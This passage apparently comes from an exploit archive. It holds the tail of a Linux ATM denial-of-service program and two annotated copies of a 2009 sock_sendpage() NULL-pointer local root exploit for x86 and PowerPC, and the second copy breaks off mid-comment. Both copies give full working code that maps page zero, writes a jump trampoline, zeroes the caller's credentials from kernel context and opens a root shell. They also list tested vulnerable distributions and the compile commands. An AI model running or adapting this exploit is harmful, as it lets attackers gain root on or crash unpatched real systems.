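 * (decaying to char *) is the conventional argument.  Mitigation is the
 * kernel fix; hosts that do not use ATM presumably avoid exposure by not
 * loading the ATM protocol modules (confirm against the patch).
 *
 * Fix relative to the page copy: the HTML-escaped `&amp;` address-of
 * operators are restored to `&` so the block compiles.
 */
int
main(void)
{
    char *err, adurit[2000];
    int i, ret, sock, proc;
    struct atm_qos dj;
    struct sockaddr_atmsvc addr;

    sock = socket(PF_ATMSVC, SOCK_DGRAM, 0);

    /* unspecified-bit-rate QoS with no AAL in both directions */
    memset(&dj, 0, sizeof(dj));
    dj.rxtp.traffic_class = ATM_UBR;
    dj.txtp.traffic_class = ATM_UBR;
    dj.aal = ATM_NO_AAL;

    ret = setsockopt(sock, SOL_ATM, SO_ATMQOS, &dj, sizeof(dj));
    if (ret == -1) {
        printf("failed !\n");
        return 1;
    }
    memset(&addr, 0, sizeof(addr));
    addr.sas_family = AF_ATMSVC;

    bind(sock, (struct sockaddr *) &addr, sizeof(addr));

    /* listen() is issued twice on the same socket (presumably part of the trigger) */
    listen(sock, 10);
    listen(sock, 10);

    /* fork chain: the parent breaks after one fork, each child forks again */
    for (i = 1; i < NUM_CPUS; ++i) {
        if (fork() != 0) {
            break;
        }
    }
    /* every process in the chain reads the proc file once */
    proc = open(ATM, O_RDONLY);
    ret = read(proc, &adurit, 2000);
    close(proc);

    return 0;
}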



Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 local denial of service exploit.

Ramon de Carvalho Valle/Linux sock_sendpage() Local Root Exploit ( na)

/*
 *  Linux sock_sendpage() NULL pointer dereference
 *  Copyright 2009 Ramon de Carvalho Valle <ramon@risesecurity.org>
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 *
 */

/*
 * This exploit was written to illustrate the exploitability of this
 * vulnerability[1], discovered by Tavis Ormandy and Julien Tinnes, on ppc
 * and ppc64.
 *
 * This exploit makes use of the SELinux and the mmap_min_addr problem to
 * exploit this vulnerability on Red Hat Enterprise Linux 5.3 and CentOS 5.3.
 * The problem, first noticed by Brad Spengler, was described by Red Hat in
 * Red Hat Knowledgebase article: Security-Enhanced Linux (SELinux) policy and
 * the mmap_min_addr protection[2].
 *
 * Support for i386 and x86_64 was added for completeness. For a more complete
 * implementation, refer to Brad Spengler's exploit[3], which also implements
 * the personality trick[4] published by Tavis Ormandy and Julien Tinnes.
 *
 * Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
 * are vulnerable.
 *
 * This exploit was tested on:
 *
 * CentOS 5.3 (2.6.18-128.7.1.el5) is not vulnerable
 * CentOS 5.3 (2.6.18-128.4.1.el5)
 * CentOS 5.3 (2.6.18-128.2.1.el5)
 * CentOS 5.3 (2.6.18-128.1.16.el5)
 * CentOS 5.3 (2.6.18-128.1.14.el5)
 * CentOS 5.3 (2.6.18-128.1.10.el5)
 * CentOS 5.3 (2.6.18-128.1.6.el5)
 * CentOS 5.3 (2.6.18-128.1.1.el5)
 * CentOS 5.3 (2.6.18-128.el5)
 * CentOS 4.8 (2.6.9-89.0.9.EL) is not vulnerable
 * CentOS 4.8 (2.6.9-89.0.7.EL)
 * CentOS 4.8 (2.6.9-89.0.3.EL)
 * CentOS 4.8 (2.6.9-89.EL)
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.7.1.el5) is not vulnerable
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.4.1.el5)
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.2.1.el5)
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.1.16.el5)
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.1.14.el5)
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.1.10.el5)
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.1.6.el5)
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.1.1.el5)
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.el5)
 * Red Hat Enterprise Linux 4.8 (2.6.9-89.0.9.EL) is not vulnerable
 * Red Hat Enterprise Linux 4.8 (2.6.9-89.0.7.EL)
 * Red Hat Enterprise Linux 4.8 (2.6.9-89.0.3.EL)
 * Red Hat Enterprise Linux 4.8 (2.6.9-89.EL)
 * SUSE Linux Enterprise Server 11 (2.6.27.19-5)
 * SUSE Linux Enterprise Server 10 SP2 (2.6.16.60-0.21)
 * Ubuntu 8.10 (2.6.27-14) is not vulnerable
 * Ubuntu 8.10 (2.6.27-11)
 * Ubuntu 8.10 (2.6.27-9)
 * Ubuntu 8.10 (2.6.27-7)
 *
 * For i386 and ppc, compile with the following command:
 * gcc -Wall -o linux-sendpage linux-sendpage.c
 *
 * And for x86_64 and ppc64:
 * gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
 *
 * [1] http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html
 * [2] http://kbase.redhat.com/faq/docs/DOC-18042
 * [3] http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz
 * [4] http://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif

#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
/*
 * Read the stack pointer (RSP) on x86_64.  Defined for symmetry with the
 * other architectures; the x86_64 current_task_struct() below reads
 * %gs:0 instead and does not call this.
 */
static __always_inline unsigned long
current_stack_pointer(void)
{
  unsigned long sp;

  asm volatile ("movq %%rsp,%0; " : "=r" (sp));

  return sp;
}

#else
/*
 * Read the stack pointer (ESP) on i386.  current_task_struct() masks the
 * result to a stack-size boundary to find the kernel stack base when
 * this code runs in kernel context.
 */
static __always_inline unsigned long
current_stack_pointer(void)
{
  unsigned long sp;

  asm volatile ("movl %%esp,%0" : "=r" (sp));

  return sp;
}

#endif

#elif defined(__powerpc__) || defined(__powerpc64__)
/*
 * Read the stack pointer on PowerPC (r1 is the ABI stack pointer).
 * current_task_struct() masks the result to a stack-size boundary to
 * find the kernel stack base when this code runs in kernel context.
 */
static __always_inline unsigned long
current_stack_pointer(void)
{
  unsigned long sp;

  asm volatile ("mr %0,%%r1; " : "=r" (sp));

  return sp;
}

#endif

#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
/*
 * x86_64: return the quadword at offset 0 of the GS segment, assumed to
 * be the per-CPU `current` task pointer while this code runs in kernel
 * context (TODO confirm against the target kernel's per-CPU layout).
 * Unlike the i386 variant there is no validation and no -1 failure path.
 */
static __always_inline unsigned long
current_task_struct(void)
{
  unsigned long task_struct;

  asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));

  return task_struct;
}

#else
#define TASK_RUNNING 0

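/*
 * i386: locate the current task_struct from kernel context by trying
 * three historical stack layouts in turn:
 *  - 4 KiB stack with thread_info at its base whose first word is the
 *    task pointer; that word must look like a kernel address
 *    (>= 0xc0000000, the kernel half under the default 3G/1G split);
 *  - 8 KiB stack with the task_struct itself at the base (pre-2.6, per
 *    the original comment below);
 *  - 8 KiB stack with thread_info at the base.
 * A candidate is accepted when its first word equals TASK_RUNNING (0),
 * the only state a task can have while executing this code.  Returns
 * (unsigned long)-1 when nothing matched; note that change_cred()'s
 * `while (task_struct)` guard does not treat that value as a failure.
 * Every dereference here faults if the guess is wrong.
 *
 * Fix relative to the page copy: the HTML-escaped `&amp;` operators are
 * restored to `&` so the block compiles.
 */
static __always_inline unsigned long
current_task_struct(void)
{
  unsigned long task_struct, thread_info;

  thread_info = current_stack_pointer() & ~(4096 - 1);

  if (*(unsigned long *)thread_info >= 0xc0000000) {
    task_struct = *(unsigned long *)thread_info;

    /*
     * The TASK_RUNNING is the only possible state for a process executing
     * in user-space.
     */
    if (*(unsigned long *)task_struct == TASK_RUNNING)
      return task_struct;
  }

  /*
   * Prior to the 2.6 kernel series, the task_struct was stored at the end
   * of the kernel stack.
   */
  task_struct = current_stack_pointer() & ~(8192 - 1);

  if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;

  /* last attempt: treat the 8 KiB base as thread_info */
  thread_info = task_struct;

  task_struct = *(unsigned long *)thread_info;

  if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;

  return -1;
}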

#endif

#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0

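/*
 * PowerPC: locate the current task_struct from kernel context.  The
 * stack pointer is masked to the stack base (16 KiB on 64-bit, 8 KiB on
 * 32-bit); the base is first tried as the task_struct itself, then as a
 * thread_info whose first word is the task pointer.  A candidate is
 * accepted when its first word equals TASK_RUNNING (0).  Unlike the i386
 * variant there is no kernel-address sanity check on the pointer read
 * from thread_info.  Returns (unsigned long)-1 when nothing matched,
 * which change_cred()'s `while (task_struct)` guard does not catch.
 *
 * Fix relative to the page copy: the HTML-escaped `&amp;` operators are
 * restored to `&` so the block compiles.
 */
static __always_inline unsigned long
current_task_struct(void)
{
  unsigned long task_struct, thread_info;

#if defined(__LP64__)
  task_struct = current_stack_pointer() & ~(16384 - 1);

#else
  task_struct = current_stack_pointer() & ~(8192 - 1);

#endif

  if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;

  /* otherwise the base holds thread_info; its first word is the task */
  thread_info = task_struct;

  task_struct = *(unsigned long *)thread_info;

  if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;

  return -1;
}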

#endif

#if defined(__i386__) || defined(__x86_64__)
/* Caller's ids, set in main() on x86 only; change_cred() matches the
 * task_struct words against them (unsigned int vs. unsigned long — the
 * comparison promotes, harmless for ids below 2^32). */
static unsigned long uid, gid;

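/*
 * Kernel-context payload (x86): reached through the trampoline main()
 * writes at address 0.  Starting at the address returned by
 * current_task_struct(), scan forward one 32-bit word at a time for four
 * words equal to uid followed by four equal to gid (presumably
 * uid/euid/suid/fsuid and the gid quartet) and zero all eight.
 *
 * The loop condition is only `task_struct != NULL`, so if the pattern is
 * absent the scan continues until it faults; the i386
 * current_task_struct() returns (unsigned long)-1 on failure, which this
 * guard does not catch.  The -1 return value is never consulted.
 *
 * Fix relative to the page copy: the HTML-escaped `&amp;&amp;` operators
 * are restored to `&&` so the block compiles.
 */
static int
change_cred(void)
{
  unsigned int *task_struct;

  task_struct = (unsigned int *)current_task_struct();

  while (task_struct) {
    if (task_struct[0] == uid && task_struct[1] == uid &&
        task_struct[2] == uid && task_struct[3] == uid &&
        task_struct[4] == gid && task_struct[5] == gid &&
        task_struct[6] == gid && task_struct[7] == gid) {
      /* eight id words -> 0 (root) */
      task_struct[0] = task_struct[1] =
      task_struct[2] = task_struct[3] =
      task_struct[4] = task_struct[5] =
      task_struct[6] = task_struct[7] = 0;
      break;
    }

    task_struct++;
  }

  return -1;
}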

#elif defined(__powerpc__) || defined(__powerpc64__)
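/*
 * Kernel-context payload (PowerPC): reached through the trampoline main()
 * writes at address 0.  uid/gid are not declared for this architecture,
 * so the scan matches on shape alone: a non-zero word followed by three
 * equal to it, then four mutually equal words.  All eight are zeroed.
 * Because the match is shape-based, any eight-word run of that form
 * before the real credentials would be corrupted instead (review note).
 *
 * The loop condition is only `task_struct != NULL`, so if the pattern is
 * absent the scan continues until it faults; current_task_struct()'s
 * (unsigned long)-1 failure value is not caught by this guard.  The -1
 * return value is never consulted.
 *
 * Fix relative to the page copy: the HTML-escaped `&amp;&amp;` operators
 * are restored to `&&` so the block compiles.
 */
static int
change_cred(void)
{
  unsigned int *task_struct;

  task_struct = (unsigned int *)current_task_struct();

  while (task_struct) {
    if (!task_struct[0]) {
      task_struct++;
      continue;
    }

    if (task_struct[0] == task_struct[1] &&
        task_struct[0] == task_struct[2] &&
        task_struct[0] == task_struct[3] &&
        task_struct[4] == task_struct[5] &&
        task_struct[4] == task_struct[6] &&
        task_struct[4] == task_struct[7]) {
      task_struct[0] = task_struct[1] =
      task_struct[2] = task_struct[3] =
      task_struct[4] = task_struct[5] =
      task_struct[6] = task_struct[7] = 0;
      break;
    }

    task_struct++;
  }

  return -1;
}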

#endif

#define PAGE_SIZE getpagesize()

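/*
 * Entry point.  Three stages:
 *
 *  1. Map the zero page (mmap(NULL, ..., MAP_FIXED)) read/write/exec and
 *     write a small trampoline into it.  x86_64: `ff 24 25 08 00 00 00`
 *     is an absolute indirect jump through address 8, and address 8 is
 *     then filled with &change_cred.  i386: `ff 25 08 00 00 00`, same
 *     idea.  ppc32: what appears to be lis/ori into r31 with
 *     change_cred's address split across two 16-bit halves, then
 *     mtctr/bctr.  ppc64: a copy of change_cred's function descriptor
 *     (see the comment in that branch).  On a kernel that enforces
 *     mmap_min_addr this mmap() fails and the program stops at "mmap:"
 *     — that is the protection the header's SELinux remarks are about.
 *  2. Open a PF_BLUETOOTH datagram socket and a one-page unlinked temp
 *     file, then sendfile() the file into the socket.  Per the header,
 *     this reaches sock_sendpage() on a protocol without a sendpage
 *     operation, so the kernel calls through a NULL pointer — i.e. the
 *     trampoline above — and change_cred() runs in kernel context.
 *  3. exec an interactive /bin/sh regardless of whether step 2 changed
 *     anything.  out_fd and in_fd are never closed, so the shell inherits
 *     them; sendfile()'s return value is not checked.
 *
 * Returns only via exit(); exit(EXIT_SUCCESS) is reached solely when
 * execl() fails.
 *
 * Fix relative to the page copy: the HTML-escaped `&amp;` address-of
 * operators are restored to `&` so the block compiles.
 */
int
main(void)
{
  char *addr;
  int out_fd, in_fd;
  char template[] = "/tmp/tmp.XXXXXX";

#if defined(__i386__) || defined(__x86_64__)
  uid = getuid(), gid = getgid();

#endif

  /* page 0, executable: fails with EPERM where mmap_min_addr is enforced */
  if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
      MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
    perror("mmap");
    exit(EXIT_FAILURE);
  }

#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
  /* jmp *0x8 ; the 8-byte store at [3] also zeroes byte 7 */
  addr[0] = '\xff';
  addr[1] = '\x24';
  addr[2] = '\x25';
  *(unsigned long *)&addr[3] = 8;
  *(unsigned long *)&addr[8] = (unsigned long)change_cred;

#else
  /* jmp *0x8 */
  addr[0] = '\xff';
  addr[1] = '\x25';
  *(unsigned long *)&addr[2] = 8;
  *(unsigned long *)&addr[8] = (unsigned long)change_cred;

#endif

#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
  /*
   * The use of function descriptors by the Power 64-bit ELF ABI requires
   * the use of a fake function descriptor.
   */
  *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;

#else
  addr[0] = '\x3f';
  addr[1] = '\xe0';
  *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
  addr[4] = '\x63';
  addr[5] = '\xff';
  *(unsigned short *)&addr[6] = (unsigned short)change_cred;
  addr[8] = '\x7f';
  addr[9] = '\xe9';
  addr[10] = '\x03';
  addr[11] = '\xa6';
  addr[12] = '\x4e';
  addr[13] = '\x80';
  addr[14] = '\x04';
  addr[15] = '\x20';

#endif

#endif

  if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
    perror("socket");
    exit(EXIT_FAILURE);
  }

  /* anonymous one-page source file for sendfile() */
  if ((in_fd = mkstemp(template)) == -1) {
    perror("mkstemp");
    exit(EXIT_FAILURE);
  }

  if(unlink(template) == -1) {
    perror("unlink");
    exit(EXIT_FAILURE);
  }

  if (ftruncate(in_fd, PAGE_SIZE) == -1) {
    perror("ftruncate");
    exit(EXIT_FAILURE);
  }

  sendfile(out_fd, in_fd, NULL, PAGE_SIZE);

  execl("/bin/sh", "sh", "-i", NULL);

  exit(EXIT_SUCCESS);
}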




Linux 2.4 and 2.6 kernel sock_sendpage() local root exploit for powerpc.

Ramon Valle/Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit (ppc) ( linux)

/*
 *  Linux sock_sendpage() NULL pointer dereference
 *  Copyright 2009 Ramon de Carvalho Valle <ramon@risesecurity.org>
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 *
 */

/*
 * This exploit was written to illustrate the exploitability of this
 * vulnerability[1], discovered by Tavis Ormandy and Julien Tinnes, on ppc
 * and ppc64.
 *
 * This exploit makes use of the SELinux and the mmap_min_addr problem to
 * exploit this vulnerability on Red Hat Enterprise Linux 5.3 and CentOS 5.3.
 * The problem, first noticed by Brad Spengler, was described by Red Hat in
 * Red Hat Knowledgebase article: Security-Enhanced Linux (SELinux) policy and
 * the mmap_min_addr protection[2].
 *
 * Support for i386 and x86_64 was added for completeness. For a more complete
 * implementation, refer to Brad Spengler's exploit[3], which also implements
 * the personality trick[4] published by Tavis Ormandy and Julien Tinnes.
 *
 * Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4
 * are vulnerable.
 *
 * This exploit was tested on:
 *
 * CentOS 5.3 (2.6.18-128.7.1.el5) is not vulnerable
 * CentOS 5.3 (2.6.18-128.4.1.el5)
 * CentOS 5.3 (2.6.18-128.2.1.el5)
 * CentOS 5.3 (2.6.18-128.1.16.el5)
 * CentOS 5.3 (2.6.18-128.1.14.el5)
 * CentOS 5.3 (2.6.18-128.1.10.el5)
 * CentOS 5.3 (2.6.18-128.1.6.el5)
 * CentOS 5.3 (2.6.18-128.1.1.el5)
 * CentOS 5.3 (2.6.18-128.el5)
 * CentOS 4.8 (2.6.9-89.0.9.EL) is not vulnerable
 * CentOS 4.8 (2.6.9-89.0.7.EL)
 * CentOS 4.8 (2.6.9-89.0.3.EL)
 * CentOS 4.8 (2.6.9-89.EL)
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.7.1.el5) is not vulnerable
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.4.1.el5)
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.2.1.el5)
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.1.16.el5)
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.1.14.el5)
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.1.10.el5)
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.1.6.el5)
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.1.1.el5)
 * Red Hat Enterprise Linux 5.3 (2.6.18-128.el5)
 * Red Hat Enterprise Linux 4.8 (2.6.9-89.0.9.EL) is not vulnerable
 * Red Hat Enterprise Linux 4.8 (2.6.9-89.0.7.EL)
 * Red Hat Enterprise Linux 4.8 (2.6.9-89.0.3.EL)
 * Red Hat Enterprise Linux 4.8 (2.6.9-89.EL)
 * SUSE Linux Enterprise Server 11 (2.6.27.19-5)
 * SUSE Linux Enterprise Server 10 SP2 (2.6.16.60-0.21)
 * Ubuntu 8.10 (2.6.27-14) is not vulnerable
 * Ubuntu 8.10 (2.6.27-11)
 * Ubuntu 8.10 (2.6.27-9)
 * Ubuntu 8.10 (2.6.27-7)
 *
 * For i386 and ppc, compile with the following command:
 * gcc -Wall -o linux-sendpage linux-sendpage.c
 *
 * And for x86_64 and ppc64:
 * gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
 *
 * [1] http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html
 * [2] http://kbase.redhat.com/faq/docs/DOC-18042
 * [3] http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz
 * [4] http://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif

#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
/*
 * Read the stack pointer (RSP) on x86_64.  Defined for symmetry with the
 * other architectures; the x86_64 current_task_struct() below reads
 * %gs:0 instead and does not call this.
 */
static __always_inline unsigned long
current_stack_pointer(void)
{
	unsigned long sp;

	asm volatile ("movq %%rsp,%0; " : "=r" (sp));

	return sp;
}

#else
/*
 * Read the stack pointer (ESP) on i386.  current_task_struct() masks the
 * result to a stack-size boundary to find the kernel stack base when
 * this code runs in kernel context.
 */
static __always_inline unsigned long
current_stack_pointer(void)
{
	unsigned long sp;

	asm volatile ("movl %%esp,%0" : "=r" (sp));

	return sp;
}

#endif

#elif defined(__powerpc__) || defined(__powerpc64__)
/*
 * Read the stack pointer on PowerPC (r1 is the ABI stack pointer).
 * current_task_struct() masks the result to a stack-size boundary to
 * find the kernel stack base when this code runs in kernel context.
 */
static __always_inline unsigned long
current_stack_pointer(void)
{
	unsigned long sp;

	asm volatile ("mr %0,%%r1; " : "=r" (sp));

	return sp;
}

#endif

#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
/*
 * x86_64: return the quadword at offset 0 of the GS segment, assumed to
 * be the per-CPU `current` task pointer while this code runs in kernel
 * context (TODO confirm against the target kernel's per-CPU layout).
 * Unlike the i386 variant there is no validation and no -1 failure path.
 */
static __always_inline unsigned long
current_task_struct(void)
{
	unsigned long task_struct;

	asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));

	return task_struct;
}

#else
#define TASK_RUNNING 0

static __always_inline unsigned long
current_task_struct(void)
{
	unsigned long task_struct, thread_info;

	thread_info = current_stack_pointer() & ~(4096 - 1);

	if (*(unsigned long *)thread_info >= 0xc0000000) {
		task_struct = *(unsigned long *)thread_info;

		/*
		 * The TASK_RUNNING is the only possible state for a process executing
		 * in user-space.
		 */
		if (*(unsigned long *)task_struct == TASK_RUNNING)
			return task_struct;
	}

	/*
	 * Prior to the 2.6 kernel series, the task_struct was stored at the end
	 * of the kernel stack.
	 */
	task_struct = current_stack_pointer() & ~(8192 - 1);

	if (*(unsigned long *)task_struct == TASK_RUNNING)
		return task_struct;

	thread_info = task_struct;

	task_struct = *(unsigned long *)thread_info;

	if (*(unsigned long *)task_struct == TASK_RUNNING)
		return task_struct;

	return -1;
}

#endif

#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0

static __always_inline unsigned long
current_task_struct(void)
{
	unsigned long task_struct, thread_info;

#if defined(__LP64__)
	task_struct = current_stack_pointer() & ~(16384 - 1);

#else
	task_struct = current_stack_pointer() & ~(8192 - 1);

#endif

	if (*(unsigned long *)task_struct == TASK_RUNNING)
		return task_struct;

	thread_info = task_struct;

	task_struct = *(unsigned long *)thread_info;

	if (*(unsigned long *)task_struct == TASK_RUNNING)
		return task_struct;

	return -1;
}

#endif

#if defined(__i386__) || defined(__x86_64__)
/* Caller's ids, recorded by main() before the trigger; the kernel-side scan looks for this pattern. */
static unsigned long uid, gid;

/*
 * Payload.  Reached in kernel context through the trampoline main() writes
 * at address 0, i.e. from the kernel's call through a NULL function
 * pointer.
 *
 * Scans forward from the current task_struct one 32-bit word at a time for
 * four words equal to our uid followed by four equal to our gid --
 * presumably uid/euid/suid/fsuid and gid/egid/sgid/fsgid on the pre-cred
 * kernels listed in the header -- and zeroes all eight.
 *
 * Caveats visible in the code:
 *   - the loop only stops on a NULL pointer, so the scan is unbounded: if
 *     the pattern is absent (or current_task_struct() returned -1) it
 *     keeps reading until it faults;
 *   - it always returns -1, which is what the kernel caller of the NULL
 *     pointer receives as the result of that call.
 */
static int
change_cred(void)
{
	unsigned int *task_struct;

	task_struct = (unsigned int *)current_task_struct();

	while (task_struct) {
		if (task_struct[0] == uid && task_struct[1] == uid &&
				task_struct[2] == uid && task_struct[3] == uid &&
				task_struct[4] == gid && task_struct[5] == gid &&
				task_struct[6] == gid && task_struct[7] == gid) {
			task_struct[0] = task_struct[1] =
			task_struct[2] = task_struct[3] =
			task_struct[4] = task_struct[5] =
			task_struct[6] = task_struct[7] = 0;
			break;
		}

		task_struct++;
	}

	return -1;
}

#elif defined(__powerpc__) || defined(__powerpc64__)
/*
 * PowerPC payload.  Same role as the x86 version, but main() records no
 * uid/gid here, so the match is purely structural: the first non-zero
 * word that is followed by three equal words, and then four mutually equal
 * words.  This is weaker than matching the caller's actual ids and could
 * in principle match something other than the credential block.  The
 * unbounded-scan and always-returns-(-1) caveats apply here too.
 */
static int
change_cred(void)
{
	unsigned int *task_struct;

	task_struct = (unsigned int *)current_task_struct();

	while (task_struct) {
		if (!task_struct[0]) {
			task_struct++;
			continue;
		}

		if (task_struct[0] == task_struct[1] &&
				task_struct[0] == task_struct[2] &&
				task_struct[0] == task_struct[3] &&
				task_struct[4] == task_struct[5] &&
				task_struct[4] == task_struct[6] &&
				task_struct[4] == task_struct[7]) {
			task_struct[0] = task_struct[1] =
			task_struct[2] = task_struct[3] =
			task_struct[4] = task_struct[5] =
			task_struct[6] = task_struct[7] = 0;
			break;
		}

		task_struct++;
	}

	return -1;
}

#endif

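/* Runtime page size; also the length of the temp file handed to sendfile(). */
#define PAGE_SIZE getpagesize()

/*
 * Entry point.
 *
 *  1. Map one page at address 0 and write an architecture-specific
 *     trampoline into it that transfers control to change_cred().
 *  2. Open a PF_BLUETOOTH datagram socket and a page-sized temp file, then
 *     sendfile() the file into the socket.  That is the path through which
 *     the kernel ends up calling a NULL pointer ([1], [2]) -- i.e. our
 *     trampoline -- so change_cred() runs in kernel context.
 *  3. Confirm the uid was cleared and exec an interactive shell.
 *
 * Exits with EXIT_FAILURE when any step fails or when the trigger did not
 * change our credentials; on success execl() does not return.
 */
int
main(void)
{
	char *addr;
	int out_fd, in_fd;
	char template[] = "/tmp/tmp.XXXXXX";

#if defined(__i386__) || defined(__x86_64__)
	/* change_cred() searches the task_struct for exactly these values. */
	uid = getuid(), gid = getgid();

#endif

	/*
	 * Nothing below works without a mapping at address 0.  Such low
	 * mappings are normally refused once vm.mmap_min_addr is set; see [3]
	 * and [4] for the bypasses the header refers to.
	 */
	if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
			MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
		perror("mmap");
		exit(EXIT_FAILURE);
	}

#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
	/*
	 * 0x00: ff 24 25 08 00 00 00   jmp *0x8   (indirect through address 8)
	 * 0x08: &change_cred
	 * The 8-byte store of the displacement also zeroes bytes 7..10; byte 8
	 * onwards is then overwritten with the pointer.
	 */
	addr[0] = '\xff';
	addr[1] = '\x24';
	addr[2] = '\x25';
	*(unsigned long *)&addr[3] = 8;
	*(unsigned long *)&addr[8] = (unsigned long)change_cred;

#else
	/*
	 * 0x00: ff 25 08 00 00 00      jmp *0x8   (indirect through address 8)
	 * 0x08: &change_cred
	 */
	addr[0] = '\xff';
	addr[1] = '\x25';
	*(unsigned long *)&addr[2] = 8;
	*(unsigned long *)&addr[8] = (unsigned long)change_cred;

#endif

#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
	/*
	 * The use of function descriptors by the Power 64-bit ELF ABI requires
	 * the use of a fake function descriptor: the first word of change_cred's
	 * descriptor (its entry address) is copied to address 0, so a descriptor
	 * "at NULL" resolves to change_cred.
	 */
	*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;

#else
	{
		/*
		 * lis r31,hi16 ; ori r31,r31,lo16 ; mtctr r31 ; bctr
		 *
		 * The two 16-bit immediates are stored natively; PowerPC is
		 * big-endian, so they land in instruction order.  Both halves are
		 * taken from the full address: the original expression
		 * `(unsigned short)change_cred>>16' truncated to 16 bits *before*
		 * shifting, so the high half was always 0.
		 */
		unsigned long target = (unsigned long)change_cred;

		addr[0] = '\x3f';
		addr[1] = '\xe0';
		*(unsigned short *)&addr[2] = (unsigned short)(target >> 16);
		addr[4] = '\x63';
		addr[5] = '\xff';
		*(unsigned short *)&addr[6] = (unsigned short)(target & 0xffff);
		addr[8] = '\x7f';
		addr[9] = '\xe9';
		addr[10] = '\x03';
		addr[11] = '\xa6';
		addr[12] = '\x4e';
		addr[13] = '\x80';
		addr[14] = '\x04';
		addr[15] = '\x20';
	}

#endif

#endif

	/* The PF_BLUETOOTH/SOCK_DGRAM choice is what makes sendfile() reach the NULL call described in [1] and [2]. */
	if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
		perror("socket");
		exit(EXIT_FAILURE);
	}

	/* Page-sized, already-unlinked source file for sendfile(). */
	if ((in_fd = mkstemp(template)) == -1) {
		perror("mkstemp");
		exit(EXIT_FAILURE);
	}

	if (unlink(template) == -1) {
		perror("unlink");
		exit(EXIT_FAILURE);
	}

	if (ftruncate(in_fd, PAGE_SIZE) == -1) {
		perror("ftruncate");
		exit(EXIT_FAILURE);
	}

	/*
	 * Trigger.  The return value says nothing useful about whether
	 * change_cred() ran (change_cred() itself hands -1 back to the kernel),
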